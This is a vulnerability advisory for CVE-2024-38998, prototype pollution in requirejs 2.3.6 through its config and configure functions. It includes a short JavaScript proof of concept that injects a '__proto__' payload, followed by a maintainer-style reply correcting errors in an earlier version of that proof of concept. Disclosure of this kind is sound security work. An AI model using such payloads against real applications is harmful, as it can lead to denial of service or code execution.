[CVE-2024-38998] Vulnerability Advisory: Prototype Pollution in requirejs, versions <= 2.3.6

Advisory_jrburke.md

Vulnerability type: Prototype Pollution

SVSS Score 8.4 HIGH

Vendor of the Package: jrburke

Affected Package:

• Product: requirejs
• Version: 2.3.6

Affected component(s):

config, s.contexts._.configure, parse

Attack vector(s): the attacker can modify built-in Object.prototype by calling the vulnerable function: config, s.contexts._.configure, parse with an argument containing a special property __proto__ to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

Description: Affected versions of this package are vulnerable to Prototype Pollution through the vulnerable function: config, s.contexts._.configure, parse. An attacker can alter the behavior of all objects inheriting from the affected prototype by passing arguments to the vulenrable function crafted with the built-in property: __proto__. The attack can potentially escalated to Denial of service, remote code execution or cross-site scripting attacks depends on the gadgets that may affected by the attack

Proof-of-Concept:

(async () => {
  const lib = await import('requirejs');

  var victim = {}

  console.log("Before Attack: ", JSON.stringify(victim.__proto__));

  try {

  lib.config (JSON.parse('{"__proto__":{"test":123}}'))
lib.s.contexts._.configure (JSON.parse('{"__proto__":{"test":123}}'))

  } catch (e) { }

  console.log("After Attack: ", JSON.stringify(victim.__proto__));

  delete Object.prototype.test;

  })();

@mestrtee Big thanks.

The above snippet confirms the possibility of injection.

Here some findings regarding such code.

The line lib.parse('{"__proto__":{"test":123}}')) seems wrong:

• number of parentheses do not match
• parse does not exist on lib

The line delete Object.prototype.polluted; seems wrong:

• should remove the injected prop test:

delete Object.prototype.test;